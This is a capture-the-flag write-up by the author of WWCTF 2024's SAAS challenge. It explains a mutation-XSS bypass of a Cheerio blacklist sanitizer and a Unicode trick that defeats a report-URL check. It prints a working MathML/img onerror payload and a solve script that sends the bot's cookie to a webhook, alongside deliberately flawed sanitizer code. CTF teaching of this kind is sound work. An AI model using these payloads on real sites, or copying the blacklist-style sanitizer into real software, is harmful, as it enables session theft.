SAAS MXSS challenge writeup from WWCTF 2024
Description
I created this challenge for WWCTF 2024, where participants are tasked with identifying and exploiting two distinct vulnerabilities. The first involves bypassing a Cheerio-based server side HTML sanitizer to execute an XSS attack via an HTML input. The second requires leveraging a logical flaw in the report endpoint to achieve exploitation.
Challenge overview
By the end of the CTF, this challenge had only two solves. Kudos to Kabilan S for achieving the first blood and Infobahn for securing the second blood!
let’s check the remote applicaition here we can enter html in the text box and we can see it got reflected back in the HTML output.
lets check the javascript behind this application
async function sanitizeHTML() {
const inputHTML = document.getElementById('html-input').value;
if (inputHTML.length <= 75) {
try {
const response = await fetch('/api/sanitize', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({ html: inputHTML })
});
const data = await response.json();
if (data.html) {
document.getElementById('sanitized-output').innerHTML = data.html;
} else {
document.getElementById('sanitized-output').textContent = `Error: ${data.error}`;
}
} catch (err) {
document.getElementById('sanitized-output').textContent = `Failed to sanitize HTML: ${err.message}`;
}
} else {
document.getElementById('sanitized-output').innerHTML = "<h1>Too Long</h1>";
}
}
function sharePage() {
const inputHTML = document.getElementById('html-input').value;
const base64HTML = btoa(unescape(encodeURIComponent(inputHTML)));
const newURL = `${window.location.origin + window.location.pathname}?html=${encodeURIComponent(base64HTML)}`;
window.location.href = newURL
}
window.onload = () => {
const urlParams = new URLSearchParams(window.location.search);
const base64HTML = urlParams.get('html');
if (base64HTML) {
const decodedHTML = decodeURIComponent(escape(atob(base64HTML)));
document.getElementById('html-input').value = decodedHTML;
sanitizeHTML();
}
}
Whenever you click the “Sanitize HTML” button, the sanitizeHTML
function is triggered. This function first checks if the input is less than 75 characters. If it is, the HTML input is sent to /api/sanitize
, and the response is set in the sanitized output using innerHTML
.
We also have access to the source code here let’s check for more details
once you check docker-compose.yml
you can see we have 2 services api
and web
services:
api:
build:
context: ./backend
ports:
- "5000"
env_file: ".env"
environment:
- NODE_ENV=production
web:
build:
context: .
dockerfile: Dockerfile
ports:
- "80:80"
depends_on:
- api
web
is a nginx container serving html files from the frontend directory and routing the /api route to api
service the api has the following code iam only wrting code which is relevant here
/*
imports and SETUP
*/
const blacklist = "a abbr acronym address applet area article aside audio b base bdi bdo big blink blockquote br button canvas caption center cite code col colgroup command content data datalist dd del details dfn dialog dir div dl dt element em embed fieldset figcaption figure font footer form frame frameset head header hgroup hr html iframe image img input ins kbd keygen label legend li link listing main map mark marquee menu menuitem meta meter multicol nav nextid nobr noembed noframes noscript object ol optgroup p output p param picture plaintext pre progress s samp script section select shadow slot small source spacer span strike strong sub summary sup svg table tbody td template textarea tfoot th thead time tr track tt u ul var video".split(" ")
const attrs = "onafterprint onafterscriptexecute onanimationcancel onanimationend onanimationiteration onanimationstart onauxclick onbeforecopy autofocus onbeforecut onbeforeinput onbeforeprint onbeforescriptexecute onbeforetoggle onbeforeunload onbegin onblur oncanplay oncanplaythrough onchange onclick onclose oncontextmenu oncopy oncuechange oncut ondblclick ondrag ondragend ondragenter ondragexit ondragleave ondragover ondragstart ondrop ondurationchange onend onended onerror onfocus onfocus onfocusin onfocusout onformdata onfullscreenchange onhashchange oninput oninvalid onkeydown onkeypress onkeyup onload onloadeddata onloadedmetadata onloadstart onmessage onmousedown onmouseenter onmouseleave onmousemove onmouseout onmouseover onmouseup onmousewheel onmozfullscreenchange onpagehide onpageshow onpaste onpause onplay onplaying onpointercancel onpointerdown onpointerenter onpointerleave onpointermove onpointerout onpointerover onpointerrawupdate onpointerup onpopstate onprogress onratechange onrepeat onreset onresize onscroll onscrollend onsearch onseeked onseeking onselect onselectionchange onselectstart onshow onsubmit onsuspend ontimeupdate ontoggle ontoggle(popover) ontouchend ontouchmove ontouchstart ontransitioncancel ontransitionend ontransitionrun ontransitionstart onunhandledrejection onunload onvolumechange onwebkitanimationend onwebkitanimationiteration onwebkitanimationstart onwebkitmouseforcechanged onwebkitmouseforcedown onwebkitmouseforceup onwebkitmouseforcewillbegin onwebkitplaybacktargetavailabilitychanged onwebkittransitionend onwebkitwillrevealbottom onwheel".split(" ")
const generateChallenge = () => {
const data = crypto.randomBytes(16).toString('hex');
script = `POW` // proof of work
return { script, data, difficulty: DIFFICULTY };
};
const sanitize = (html) => {
const unsafe = cheerio.load(html);
for (const tag of blacklist) {
unsafe(tag, "body").remove();
}
unsafe('*').each((_, el) => {
for (const attr of attrs) {
unsafe(el).removeAttr(attr);
}
});
return unsafe("body").html();
}
app.post('/api/sanitize', async (req, res) => {
try {
const { html } = req.body;
if (html) {
const sanitizedHTML = sanitize(html);
res.json({ html: sanitizedHTML });
} else {
res.status(400).json({ error: 'No HTML provided' });
}
} catch (err) {
console.log(err)
res.status(500).json({ error: 'Something went wrong' });
}
});
app.get('/api/report', (req, res) => {
// send POW challenge
});
app.post('/api/report', async (req, res) => {
const { data, nonce, urlToVisit, secretKey } = req.body;
if (!data || nonce === undefined || urlToVisit === undefined || secretKey === undefined) {
return res.status(400).json({ success: false, error: 'Invalid request format.' });
}
const difficulty = activeChallenges.get(data);
if (!difficulty) {
return res.status(400).json({ success: false, error: 'Challenge not found or expired.' });
}
const isValid = validateSolution(data, nonce, difficulty);
if (isValid) {
activeChallenges.delete(data);
try {
const context = await (await browser).createBrowserContext();
const page = await context.newPage();
// SET cookie
if (urlToVisit.includes(CHALL_DOMAIN)) {
if (secretKey !== ACCESSKEY) {
return res.status(403).json({ success: false, error: 'secretKey is invalid you can not report' });
}
}
const url = new URL(urlToVisit)
if (url.host !== CHALL_DOMAIN) {
return res.status(400).json({ success: false, error: 'Given URL is out of scope' });
}
try {
// Visit the page
return res.json({ success: true, message: 'Admin verified your report.' });
} catch (error) {
// ERROR Handing
}
} catch (error) {
// ERROR Handing
}
}
return res.status(400).json({ success: false, error: 'Invalid solution.' });
});
app.listen(PORT, async () => {
console.log(`SaAS running at http://localhost:${PORT}`);
});
Let’s examine the /sanitize
endpoint. This endpoint processes the input by parsing it with cheerio
, removing specific tags and attributes listed in the blacklist provided above.
Fortunately, the blacklist does not include the math
tag, making it an excellent candidate for confusing parsers. Let’s explore some potential mXSS vectors using this tag.
before trying to solve this lets setup a test script to check our mxss vectors.the following code is used by me
const cheerio = require('cheerio');
const html = "<test>hay</test>"
const $ = cheerio.load(html);
console.log($("body").html());
Identifying a Potential Payload
From the MXSS cheatsheet (available on SonarSource MXSS Cheatsheet), we can find potential payloads that could work around the blacklist. For instance, the following payload is a good candidate:
This payload triggers an alert on the browser due to the onerror
of an img
. However, some elements in this payload, like <table>
, are blacklisted by the server. We need to refine this.
Refining the Payload
First, we simplify the payload by removing unnecessary elements, such as table
with the id
attribute, and test it again:
The cheerio parses this and transforms it into:
<math><mtext><mglyph><style><math><img src=x onerror=alert(1)></style></mglyph><table></table></mtext></math>
when you submit the following as input to the application This payload successfully triggers an alert in the browser, despite the server-side parsing removing certain elements like <table>
at the end.
From the source code, we know the goal is to steal the cookie. However, the challenge lies in the payload length restriction. To address this, we can use a well-known XSS trick to shorten the payload by leveraging eval(`'`+URL)
. Additionally, we have the ability to control the URL being sent to the bot, making this feasible.
Here’s the code that generates a link capable of sending the token to your endpoint.
import base64
import requests
webhook = "YOUR_WEB_HOOK"
payload = f"window.location='{webhook}'+btoa(document.cookie)"
encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
report_url = f"https://saas.wwctf.com/?html=PG1hdGg%2BPG10ZXh0Pjx0YWJsZT48bWdseXBoPjxzdHlsZT48bWF0aD48aW1nIHNyYz14IG9uZXJyb3I9ZXZhbChgJ2ArVVJMKT4%3D#'+eval(atob('{encoded_payload}'))"
print(report_url)
if you change the eval to alert you can see the payload in action.
We face a second issue when reporting: to make the bot visit our link, we must bypass the following checks. The urlToVisit
is the URL we provide, and if it belongs to the challenge domain, we are required to supply a secretKey
that matches the server-side randomly generated ACCESSKEY
. Since there’s no way to know the secretKey
, this check cannot be satisfied. If we provide a URL from any other domain, the second check will fail because it ensures the URL’s host matches the challenge domain. Additionally, redirects cannot be used.
Here’s the code snippet implementing these checks:
if (urlToVisit.includes(CHALL_DOMAIN)) {
if (secretKey !== ACCESSKEY) {
return res.status(403).json({ success: false, error: 'secretKey is invalid you can not report' });
}
}
const url = new URL(urlToVisit)
if (url.host !== CHALL_DOMAIN) {
return res.status(400).json({ success: false, error: 'Given URL is out of scope' });
}
However, there is a logical flaw in the implementation. The includes
method behaves differently from the URL
object. If you insert a Unicode character in the domain, such as using 𝙎
instead of s
, the includes
check will fail, but the URL
object will normalize it back to s
. This inconsistency allows you to bypass the check and submit the URL to the bot successfully.
final solve script
import hashlib
import time
from multiprocessing import Pool, cpu_count
import sys
def find_nonce(args):
message, nonce_start, nonce_end, prefix = args
for nonce in range(nonce_start, nonce_end):
combined = f'{message}{nonce}'.encode()
hash_result = hashlib.sha256(combined).hexdigest()
if hash_result.startswith(prefix):
return nonce
return None
def proof_of_work(message):
prefix = '0'*6
nonce = 0
num_processes = 1
chunk_size = 1000000
start_time = time.time()
with Pool(processes=num_processes) as pool:
while True:
tasks = [
(message, nonce + i * chunk_size, nonce + (i + 1) * chunk_size, prefix)
for i in range(num_processes)
]
results = pool.map(find_nonce, tasks)
for result in results:
if result is not None:
end_time = time.time()
nonce = result
print(f'Time taken: {end_time - start_time} seconds')
return nonce
nonce += num_processes * chunk_size
if __name__ == "__main__":
print("Working....")
data = "dae016e1c3d8fe84176a6d7691f57fdb" # get the pow data from /api/report
nonce = proof_of_work(data)
print(nonce)
############## The above code is for POW ################
############## SOLUTION code ################
import base64
import requests
webhook = "WEBHOOK URL"
payload = f"window.location='{webhook}'+btoa(document.cookie)"
encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
report_url = f"https://𝙎aas.wwctf.com/?html=PG1hdGg%2BPG10ZXh0Pjx0YWJsZT48bWdseXBoPjxzdHlsZT48bWF0aD48aW1nIHNyYz14IG9uZXJyb3I9ZXZhbChgJ2ArVVJMKT4%3D#'+eval(atob('{encoded_payload}'))"
print(report_url)
resp = requests.post("https://saas.wwctf.com/api/report", json={
"secretKey": "asdsd",
"urlToVisit": report_url,
"nonce": nonce,
"data":data
})
print(resp.text)
A request from bot
https://webhook.site/YOUR-ID/ZmxhZz13d2Z7SFRNTF9yMFVOZFRSMVBfZjByX3RIM19XMU5fNE5kX1MzUlYzUl81SUQzX0g3TUxfUzROMVQxWjRUSTBOXzFTX0I0RF8xRDM0fQ==
decoding the path you will get the flag wwf{HTML_r0UNdTR1P_f0r_tH3_W1N_4Nd_S3RV3R_5ID3_H7ML_S4N1T1Z4TI0N_1S_B4D_1D34}
the vulnability here is similar to CVE-2024-52595
which is a namespace confusion sanitizer bypass in python lxml-html-clean
Community solutions
Check out Kabin’s writeup, where he used a URL-encoded input like saas.wwctf%2ecom
to bypass the report URL check.
Team Infobahn’s solution utilized the fact that xhr
and style
tags behave the same way when used in the MathML namespace. Additionally, within the MathML namespace, it is possible to load iframes.
Feel free to ping me on LinkedIn if you spot any inaccuracies in this blog.
Refrence
Check the following blogs to learn more about MXSS